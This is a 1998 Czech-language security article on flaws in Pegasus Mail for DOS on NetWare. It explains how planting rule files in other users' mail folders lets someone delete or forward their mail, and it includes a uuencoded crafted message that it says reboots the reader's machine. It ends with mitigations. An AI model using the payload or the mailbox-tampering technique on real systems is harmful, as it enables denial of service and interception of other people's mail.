Diry v pegasus mailu pro dos
Jiste $SUBJ znate... je to program, ktery se diky tomu, ze je zadarmo, vetrel
snad na vsechny ceske skoly, kde maji nejakou sit. Dalsi jeho zajimavosti je,
ze nema osetrene urcite neocekavane stavy. Tak se ve starsich verzich stavalo, ze
pri cteni ceskeho mailu v mime skolaboval. Verze 3.4-r0 jiz tyto bugy nema, ma
ale jine (jak je zvykem). Napriklad nejde v 3.4 cist maily, ktere maji
Content-Type: v hlavicce, ale chybi jine udaje. Nektere bugy vsak stale
zustaly, takze jimi zacneme. Vzhledem k tomu, ze v netware maji useri
vetsinou do adresare sys:mail pravo create, muzou velmi jednoduse vkladat do
mail-adresaru uzivatelu soubory. Tento bug se casto vyuzival k vlozeni login
scriptu, pokud ho user nemel. To se jiz resi tak, ze kazdy nove zalozeny user
dostane prazdny login script. Tato varianta ale neresi cely problem a tak staci
najit dalsi soubor, ktery vytvorime uzivateli a my z toho budeme neco mit...
PMail ma takovych souboru hromadu. Muzete napriklad vyrobit userovi
rule-file, staci jej pouze nakopirovat do mail-diru. Potom mu muzete jeho
prichozi maily mazat, nebo si je forwardovat... Dalsim zajimavym souborem je
xxxsig.pms, v nem jsou signatury. A nyni k tem zajimavejsim vecem. Pmail nema
kontrolu buffer overflow u funkci, ktere pracuji s Content-Type:,
Mime-Version:, X-Mailer: a MHS-ID:. Mozna ze i u dalsich, nemel jsem uz naladu
to zkouset. Bohuzel jsou tyto holes znacne nezajimave, nebot promenne jsou
dynamicky alokovane. To ma za dusledek, ze uzivatel vidi v mailu nesmysly a
pri prohlizeni to vyvolava exceptiony :-))). Mnohem hezci bug je v
identifikaci kodovani from adresy. Jiste to znate, nektere windoze-based
mailreadery to pouzivaji: From: =?windoze-1250?Q?J=EFn_Pet=ABi=DA?=. To mi
pripada jako velke plytvani mistem, takze to nejak vyuzijeme, ne? Muzeme si
takto napriklad posilat programy, nebo neco podobneho. Nasledujici nesmysl v
PMailu 4.3-r0-dos rebootuje pocitac. Jake prekvapeni, kdyz uzivatel spusti
pmail a pocitac se mu restartuje...
begin 0777 crash.cnm
M1G)O;3H@/3]T:&ES+6ES+7-M86QL+65M86EL+7=H:6-H+7)E8F]O=',M>6]U
M<BUC;VUP=71E<BUI;BUP96=A<W5S+6UA:6PM=F5R<VEO;BTS+30P+7(P+69O
M<BUD;W,M+2U334E,12U03$5!4T4M+?#P\/`_43]*35`@1C!&,#I&,$8P/ST-
M"E1O.B!9;W4-"E-U8FIE8W0Z(%)E8F]O="!M>2!C;VUP=71E<B$-"@T*2&5L
M;&\L#0II9B!Y;W4@<F5A9"!T:&ES+"!Y;W4@87)E(&YO="!U<VEN9R!P;2!V
-,RXT+7(P+61O<RXN+@``
end
Jak se proti temto zlomyslnostem branit? Nejlepe je asi odebrat pravo Create
k SYS:MAIL a prenos posty resit pomoci mercury (jiny adresar). Dalsi reseni je
vsem uzivatelum vyrobit prazdne potencialni "nebezpecne" soubory. Proti buffer
overflow attackum se da branit tezko, jedine snad nepouzivat pmail, ale
nejaky mene "bugoidni" mailer. Nebo si aspon patchnete pmail tak, aby neposilal
v hlavicce X-Mailer: Pegasus Mail 3.4
Copyright (c) 1998 Martin Hinner, All rights reserved